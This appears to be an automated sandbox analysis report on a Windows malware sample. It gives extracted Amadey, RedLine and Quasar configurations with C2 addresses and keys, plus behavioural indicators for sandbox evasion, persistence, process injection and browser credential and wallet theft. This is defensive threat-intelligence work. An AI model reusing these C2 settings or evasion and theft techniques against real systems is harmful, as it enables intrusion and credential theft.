Analysis
max time kernel: 149s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240730-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240730-en, locale:en-us, os:windows10-2004-x64, system
submitted: 31-07-2024 01:05
Static task: static1
Behavioral task: behavioral1
  Sample: 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
  Resource: win10v2004-20240730-en
General
Target: 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
Size: 1.8MB
MD5: c015c231f5d013a7031748f95129a969
SHA1: 27f74431dbaa7b8bd16a5ddc0b871da65ea62849
SHA256: 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4
SHA512: baf6f0d3752e49ad769325bde85129d803094ea42e9d9735eafb3f415014e6d2f07a977d8892fef85307bc80e0060f0ef3c364ef3b6d05a0d4324956723a194e
SSDEEP: 49152:AsoGdXqMpDQe+xIfJJzbTR4O8/t76/rhCDfpIrs:poGtqMpU9KhF6OB/rIDpI
Malware Config
Extracted
  Family: amadey
  Version: 4.41
  Botnet: 0657d1
  C2: http://185.215.113.19
  Attributes:
    install_dir: 0d8f5eb8a7
    install_file: explorti.exe
    strings_key: 6c55a5f34bb433fbd933a168577b1838
    url_paths: /Vi9leo/index.php
Extracted
  Family: amadey
  Version: 4.41
  Botnet: fed3aa
  C2: http://185.215.113.16
  Attributes:
    install_dir: 44111dbc49
    install_file: axplong.exe
    strings_key: 8d0ad6945b1a30a186ec2d30be6db0b5
    url_paths: /Jo89Ku7d/index.php
Extracted
  Family: redline
  Botnet: exodusmarket.io
  C2: 91.92.240.111:1334
Extracted
  Family: quasar
  Version: 1.4.1
  Botnet: Office04
  C2: 51.222.21.20:4782
  Mutex: 374acc94-a8cd-45c6-bc31-752e0f83541d
  Attributes:
    encryption_key: 5B2A5F50FABB3F6748116D7077D95758D0DFFC77
    install_name: svchost.exe
    log_directory: Logs
    reconnect_delay: 3000
    startup_key: svchost
    subdirectory: SubDir
Signatures
Quasar payload (2 IoCs)
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\adada.exe | family_quasar
  behavioral2/memory/7868-1460-0x0000000000A30000-0x0000000000D54000-memory.dmp | family_quasar
RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload (1 IoCs)
  resource | yara_rule
  behavioral2/memory/5748-540-0x0000000000400000-0x000000000041E000-memory.dmp | family_redline
SectopRAT payload (1 IoCs)
  resource | yara_rule
  behavioral2/memory/5748-540-0x0000000000400000-0x000000000041E000-memory.dmp | family_sectoprat
Credentials from Password Stores: Credentials from Web Browsers (1 TTPs)
  Malicious access to or copy of a web browser credential store.
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 9 IoCs)
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplong.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorti.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorti.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorti.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplong.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplong.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorti.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 879432f808.exe
Downloads MZ/PE file
Checks BIOS information in registry (2 TTPs, 18 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorti.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorti.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorti.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorti.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 879432f808.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorti.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorti.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorti.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorti.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 879432f808.exe
Checks computer location settings (2 TTPs, 7 IoCs)
  Looks up the country code configured in the registry, likely a geofence.
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation | 471a98aee8.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation | 879432f808.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation | axplong.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation | RegAsm.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation | dropperrr.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation | 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Control Panel\International\Geo\Nation | explorti.exe
Executes dropped EXE (14 IoCs)
  pid | process
  3116 | explorti.exe
  1492 | 471a98aee8.exe
  5692 | a2f7c1badc.exe
  5700 | explorti.exe
  5224 | 879432f808.exe
  5064 | axplong.exe
  1492 | deepweb.exe
  6300 | pureee.exe
  7868 | adada.exe
  8000 | dropperrr.exe
  8964 | axplong.exe
  8956 | explorti.exe
  8564 | axplong.exe
  8548 | explorti.exe
Identifies Wine through registry keys (2 TTPs, 9 IoCs)
  Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
  description | ioc | process
  Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | axplong.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | explorti.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | axplong.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | explorti.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | explorti.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | explorti.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | 879432f808.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\Software\Wine | axplong.exe
Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Adds Run key to start application (2 TTPs, 2 IoCs)
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\471a98aee8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\471a98aee8.exe" | explorti.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a2f7c1badc.exe = "C:\\Users\\Admin\\1000029002\\a2f7c1badc.exe" | explorti.exe
Blocklisted process makes network request (2 IoCs)
  flow | pid | process
  192 | 7412 | msiexec.exe
  194 | 7412 | msiexec.exe
Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
Enumerates connected drives (3 TTPs, 23 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  description | ioc | process
  File opened (read-only) | \??\X: | msiexec.exe
  File opened (read-only) | \??\Z: | msiexec.exe
  File opened (read-only) | \??\N: | msiexec.exe
  File opened (read-only) | \??\O: | msiexec.exe
  File opened (read-only) | \??\P: | msiexec.exe
  File opened (read-only) | \??\T: | msiexec.exe
  File opened (read-only) | \??\V: | msiexec.exe
  File opened (read-only) | \??\K: | msiexec.exe
  File opened (read-only) | \??\Q: | msiexec.exe
  File opened (read-only) | \??\W: | msiexec.exe
  File opened (read-only) | \??\A: | msiexec.exe
  File opened (read-only) | \??\G: | msiexec.exe
  File opened (read-only) | \??\H: | msiexec.exe
  File opened (read-only) | \??\I: | msiexec.exe
  File opened (read-only) | \??\J: | msiexec.exe
  File opened (read-only) | \??\B: | msiexec.exe
  File opened (read-only) | \??\E: | msiexec.exe
  File opened (read-only) | \??\M: | msiexec.exe
  File opened (read-only) | \??\Y: | msiexec.exe
  File opened (read-only) | \??\L: | msiexec.exe
  File opened (read-only) | \??\R: | msiexec.exe
  File opened (read-only) | \??\S: | msiexec.exe
  File opened (read-only) | \??\U: | msiexec.exe
Drops file in System32 directory (2 IoCs)
  description | ioc | process
  File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | chrome.exe
  File created | \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | chrome.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (10 IoCs)
  pid | process
  4788 | 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
  3116 | explorti.exe
  5700 | explorti.exe
  5692 | a2f7c1badc.exe
  5224 | 879432f808.exe
  5064 | axplong.exe
  8964 | axplong.exe
  8956 | explorti.exe
  8564 | axplong.exe
  8548 | explorti.exe
Suspicious use of SetThreadContext (11 IoCs)
  description | pid | process | target process
  PID 1492 set thread context of 5748 | 1492 | deepweb.exe | RegAsm.exe
  PID 6300 set thread context of 8348 | 6300 | pureee.exe | AddInProcess.exe
  PID 6300 set thread context of 8164 | 6300 | pureee.exe | AddInProcess.exe
  PID 6300 set thread context of 8900 | 6300 | pureee.exe | AddInProcess.exe
  PID 6300 set thread context of 7992 | 6300 | pureee.exe | AddInProcess.exe
  PID 6300 set thread context of 9188 | 6300 | pureee.exe | AddInProcess.exe
  PID 6300 set thread context of 4228 | 6300 | pureee.exe | AddInProcess.exe
  PID 6300 set thread context of 8136 | 6300 | pureee.exe | AddInProcess.exe
  PID 6300 set thread context of 6276 | 6300 | pureee.exe | AddInProcess.exe
  PID 6300 set thread context of 6728 | 6300 | pureee.exe | AddInProcess.exe
  PID 6300 set thread context of 6620 | 6300 | pureee.exe | AddInProcess.exe
Drops file in Windows directory (2 IoCs)
  description | ioc | process
  File created | C:\Windows\Tasks\explorti.job | 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
  File created | C:\Windows\Tasks\axplong.job | 879432f808.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoCs)
  pid | pid_target | process | target process
  6216 | 5692 | WerFault.exe | a2f7c1badc.exe
System Location Discovery: System Language Discovery (1 TTPs, 9 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | a2f7c1badc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 879432f808.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | axplong.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegAsm.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 471a98aee8.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | explorti.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | deepweb.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | dropperrr.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe
Checks processor information in registry (2 TTPs, 8 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | firefox.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Enumerates system info in registry (2 TTPs, 6 IoCs)
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Modifies registry class (2 IoCs)
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000_Classes\Local Settings | firefox.exe
  Key created | \REGISTRY\USER\S-1-5-21-3881032017-2947584075-2120384563-1000_Classes\Local Settings | dropperrr.exe
Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes:
0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exeexplorti.exemsedge.exemsedge.exechrome.exeexplorti.exe879432f808.exeaxplong.exeRegAsm.exepureee.exeaxplong.exeexplorti.exepid process 4788 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe 4788 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe 3116 explorti.exe 3116 explorti.exe 888 msedge.exe 888 msedge.exe 848 msedge.exe 848 msedge.exe 2348 chrome.exe 2348 chrome.exe 5700 explorti.exe 5700 explorti.exe 5224 879432f808.exe 5224 879432f808.exe 5064 axplong.exe 5064 axplong.exe 5748 RegAsm.exe 5748 RegAsm.exe 5748 RegAsm.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 8964 axplong.exe 8964 axplong.exe 8956 explorti.exe 8956 explorti.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe 6300 pureee.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (5 IoCs)
  pid | process
  848 | msedge.exe
  848 | msedge.exe
  848 | msedge.exe
  2348 | chrome.exe
  2348 | chrome.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
chrome.exefirefox.exeRegAsm.exeadada.exedescription pid process Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeDebugPrivilege 1056 firefox.exe Token: SeDebugPrivilege 1056 firefox.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeDebugPrivilege 5748 RegAsm.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: 
SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeDebugPrivilege 7868 adada.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe Token: SeShutdownPrivilege 2348 chrome.exe Token: SeCreatePagefilePrivilege 2348 chrome.exe -
Suspicious use of FindShellTrayWindow (64 IoCs)
Processes:
0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exefirefox.exemsedge.exechrome.exepid process 4788 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe -
Suspicious use of SendNotifyMessage (64 IoCs)
Processes:
firefox.exemsedge.exechrome.exepid process 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 848 msedge.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 1056 firefox.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe 2348 chrome.exe -
Suspicious use of SetWindowsHookEx (2 IoCs)
  pid | process
  1056 | firefox.exe
  5692 | a2f7c1badc.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exeexplorti.exe471a98aee8.execmd.exechrome.exemsedge.exefirefox.exefirefox.exedescription pid process target process PID 4788 wrote to memory of 3116 4788 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe explorti.exe PID 4788 wrote to memory of 3116 4788 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe explorti.exe PID 4788 wrote to memory of 3116 4788 0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe explorti.exe PID 3116 wrote to memory of 1492 3116 explorti.exe 471a98aee8.exe PID 3116 wrote to memory of 1492 3116 explorti.exe 471a98aee8.exe PID 3116 wrote to memory of 1492 3116 explorti.exe 471a98aee8.exe PID 1492 wrote to memory of 4860 1492 471a98aee8.exe cmd.exe PID 1492 wrote to memory of 4860 1492 471a98aee8.exe cmd.exe PID 4860 wrote to memory of 2348 4860 cmd.exe chrome.exe PID 4860 wrote to memory of 2348 4860 cmd.exe chrome.exe PID 4860 wrote to memory of 848 4860 cmd.exe msedge.exe PID 4860 wrote to memory of 848 4860 cmd.exe msedge.exe PID 4860 wrote to memory of 5064 4860 cmd.exe firefox.exe PID 4860 wrote to memory of 5064 4860 cmd.exe firefox.exe PID 2348 wrote to memory of 752 2348 chrome.exe chrome.exe PID 2348 wrote to memory of 752 2348 chrome.exe chrome.exe PID 848 wrote to memory of 4648 848 msedge.exe msedge.exe PID 848 wrote to memory of 4648 848 msedge.exe msedge.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 
5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 1056 5064 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe 
firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe PID 1056 wrote to memory of 876 1056 firefox.exe firefox.exe -
Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes
